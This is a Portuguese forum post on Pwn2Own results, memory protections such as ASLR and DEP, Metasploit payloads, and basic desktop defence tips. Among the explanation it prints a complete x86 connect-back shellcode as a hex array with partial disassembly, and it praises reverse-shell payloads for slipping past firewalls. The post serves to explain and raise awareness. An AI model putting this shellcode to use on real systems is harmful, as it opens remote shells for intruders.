Ir para o conteúdo
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

herakty

Tudo crackado incluido proteções de memória no Pwn2Own2 e bases do exploitation

Mensagens Recomendadas

herakty

claro que o tudo são as aplicações presentes pelos fabricantes nos concursos que no fundo foram todos os browsers principais e alguns SO´s, assim como mecanismos específicos de protecção

segurança é o eterno jogo do gato e do rato como em muitas outras áreas... recentemente trabalhei com alarmes de instalações e passa-se o mesmo... faz-se uma protecção até que alguém descobre como ultrapassar.. a seguir faz-se outra e assim eternamente...

há mts pessoas a estudarem estas coisas, também a segurança informática e como tirar partido dos sistemas alheios... e agora que há financiamento de países e do crime organizado... minha mãe

e não vou falar do vector web como SQL Injection e XSS que já permitem também ter shell´s remotas e fazer tudo com os dados remotos

e não há SO´s não vulneráveis nem programas... tudo nas TI pode ser "explorado" de forma maliciosa, pois tudo é feito pelo homem e tudo se baseia em código e instruções que podem ser manipuladas... vejam esta frase do manual de payloads, onde podem ver que todos os SO´s são alvo.. mas se virem no metasploit vão ver também os UNIX puros com AIX, SOLARIS, etc

I will use Msfpayload to create several Windows, LINUX and Macintosh OS X payloads.

SO´s com payloads para diversas acções (antigamente era apenas uma shell, linha de comandos, mas isto evolui-o de forma que já há payloads para coisas especificas como colocar uma DLL em memória, ou criar um user e coloca-lo logo com ROOT ou ADMINISTRATOR)

No trunk:

http://www.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles'>http://www.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles

Reparem que o mais poderoso, o "shell_reverse_tcp.rb" que cria uma shell no sistema remoto e a ligação é efectuada a partir do alvo, pelo que se houver uma firewall pelo meio, esta vai ser enganada pensando que é um user de dentro a fazer uma ligação legitima  :)

  • aix
  • bsd
  • bsdi
  • linux
  • osx
  • solaris
  • windows

Aqui podem ver todo o metasploit no seu trunk SVN (podem ver as tools, os exploits, os payloads, está aqui todo o metasploit)

http://www.metasploit.com/redmine/projects/framework/repository

MAS É POSSÍVEL ESTAR-SE NUM NÍVEL DE SEGURANÇA QUE AFASTA 98% DOS CRACKERS E OS 2% NÃO ESTÃO INTERESSADOS EM NÓS OU NOS NOSSOS SERVIDORES

Pequenas notas para se estar mais seguro

  • Usar uma firewall aplicacional como a ZoneAlarm

(pois permite configurar comportamentos de aplicações a vários níveis, bloqueando assim qualquer outro programa não autorizado e permite "cortar" coisas especificas como envio de emails por aplicação ou processo. Uso isto no desktop e estou muito satisfeito. Para perímetro a IP Cop)

  • Usar uma sandbox como a sandboxie quando se visita sites não confiáveis ou executar um programa que não confiam (mesmo que haja algo malicioso não chega ao sistema operativo)
  • Usar um AV decente e fazer de vez em quando uma análise com o kapersky online (detecta tudo.. só não o uso porque é bom demais e muito pesado, pois está sempre a analisar o comportamento dos programas em demasia)
  • Ter sempre o sistema operativo e todos os programas usados na ultima versão e com todas as actualizações
  • Usar o tcp view e o process monitor para analisarem as comunicações e tudo o que está mesmo a acontecer no vosso PC... se virem montes de ligações para uma porta 25 de um ip externo é porque estão com um worm de Spam... ou outras ligações, particularmente portas estranhas e até podem ver com o c:\netstat -ab quais as ligações e os programas que as fazem... podem usar tb o process monitor da SysInternals

Usem extensivamente estas ferramentas da Sysinternals que agora até pertence à M$...mas é desenvolvida por um dos melhores programadores do mundo... vejam por vós as tools

Destaco:

  • Process Monitor v2.9
  • Process Explorer v12.03
  • TCPView for Windows v2.54

http://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

ainda recentemente alguém falava das medidas de segurança e protecções e que assim era impossível qualquer crackanço (apesar das maiores empresas e as organizações mais seguras serem constantemente crackadas)... uma das mais duras (difíceis, supostamente) são as relacionadas com "protecções" de memória, pois é onde a maioria do exploitation acontece

como se pode ver todos os browsers e aplicações a concurso foram crackadas e até o IPhone da apple e um MacBook Pro Air... para as empresas é melhor ficar a saber disto com um profissional antes dos criminosos

resultado... tudo, quer a nível de Sistemas operativos, quer a nível de browseres foi crackado, mesmo com "protecções de memória" como ASLR (address space layout randomization) que supostamente tornava impossível o uso de exploits, pois nunca se sabe quais os endereços a usar e afecta também na questão dos NOPS (espaços para avançar para a area de execução da memória para lá injectar o código directamente no processo com payloads em assembley)

o exploitation usa este esquema de corrupção da memória para injectar código nas áreas de execução... que supostamente não é possível, mas errar é humano e basta uma má validação do tamanho de uma variável para se ter uma vulnerabilidade... claro que hoje se anda num nível mt mais avançado

depois de se descobrir a vulnerabilidade usam-se "espaços" para se chegar ao endereço onde se injecta um payload como mostro a seguir

vejam este artigo sobre payloads (o shell [ou não] code injectado directamente na memória)... o payload é algo como está a seguir e que mais em baixo podem ver a sua representação em assembley

Neste pequeno artigo com referencias a complementos, podem aprender mais sobre o mundo dos payloads e programação em assembley

http://blog.metasploit.com/2010/04/penetration-testing-learn-assembly.html

/* SHELLCODE - this is a connect back shellcode */
u8 shellcode[]=
"\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46"
"\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89"
"\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
"\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90"
"\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59"
"\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46"
"\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86"
"\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06"
"\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0"
"\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62"
"\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46"
"\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
"\xcd\x80\x31\xc0\x40\xcd\x80";

como podem ver no artigo isto corresponde em assembly a isto

00000000  3C90              cmp al,0x90
00000002  89E6              mov esi,esp
00000004  83C640            add esi,byte +0x40
00000007  C70602000BAC      mov dword [esi],0xac0b0002
0000000D  C7460497C447A0    mov dword [esi+0x4],0xa047c497
00000014  31C0              xor eax,eax
[snip]
00000058  7432              jz 0x8c
0000005A  8B0424            mov eax,[esp]
0000005D  894608            mov [esi+0x8],eax
00000060  90                nop
00000061  BD7F000001        mov ebp,0x100007f
00000066  896E04            mov [esi+0x4],ebp
00000069  C70603803586      mov dword [esi],0x86358003
0000006F  B804000000        mov eax,0x4

arquitectura do metasploit

59

Projecto Metasploit

http://www.metasploit.org/

Excelente estudo sobre a detecção dos payloads pelos AV´s (onde se mostra que os AV´s não são a solução para exploits)

Submitting the payloads generated by the default options for msfpayload showed that in general most of the payloads go undetected by antivirus products.  No antivirus product successfully identified the payload as part of the Metasploit framework.

Effectiveness of Antivirus in Detecting Metasploit Payloads

http://www.sans.org/reading_room/whitepapers/casestudies/effectiveness-antivirus-detecting-metasploit-payloads_2134

um artigo porreiro que fala destas novas frameworks e da facilidade do exploitation nos dias de hoje em relação ao passado

http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1135581,00.html

Frases interessantes sobre o concurso Pwn2Own2:

Não se riam os fãs da Apple: iPhone e Safari passaram pela mesma "vergonha" neste concurso de hackers.
Mais uma vez o concurso provou que nenhuma das "vítimas do costume" está a salvo do engenho dos "suspeitos do costume" - nem mesmo o recém-lançado browser Internet Explorer 8, quando usado num Windows 7 de 64 bits, escapou.

De acordo com a Computerworld, um especialista holandês e outro alemão ganharam prémios de 10 mil euros depois de assumirem o controlo de uma máquina com a versão mais recente do Windows.

O hacker holandês, que dá pelo nome de Peter Vreugdenhil, surpreendeu a plateia ao combinar vários métodos de ataque para superar as barreiras de segurança criadas pelos sistemas DEP (data execution prevention) e ASLR (address space layout randomization), da Microsoft.

Com esta combinação de técnicas de ataque, que já se encontra publicada na Web , Vreugdenhil precisou apenas de dois minutos para ganhar o prémio na categoria de "ataques ao IE8 no Windows 7" - mas demorou mais de meia hora para alcançar o mesmo feito com o Firefox 3.6 (a correr num Windows 7 de 64 bits), arrecadando mais uma vez 10 mil dólares de prémio.

O concurso de Hackers premiou ainda com 10 mil dólares Charlie Miller, que assumiu o controlo à distância de um MacBook Pro Air, a partir de uma vulnerabilidade do browser Safari.

Miller não é um novato no concurso e já em 2009 ganhou 5000 dólares com um ataque ao Safari, lembra a Cnet.

Ainda no reino da Apple, resta lembrar que nem a "jóia da coroa" - que é como quem diz, o iPhone - se livrou das partidas dos peritos de segurança.

E ao contrário do que possa parecer o método usado não foi assim tão diferente do que costuma acontecer com as máquinas que correm outros sistemas operativos.

A Vincenzo Iozzo e a Ralf Philipp Weinmann bastou o desenvolvimento de um código malicioso, durante duas semanas, e encaminhar um iPhone para um site que distribui esses códigos para aceder aos SMS que se encontram no terminal.

teckV

Partilhar esta mensagem


Ligação para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora

×

Aviso Sobre Cookies

Ao usar este site você aceita os nossos Termos de Uso e Política de Privacidade. Este site usa cookies para disponibilizar funcionalidades personalizadas. Para mais informações visite esta página.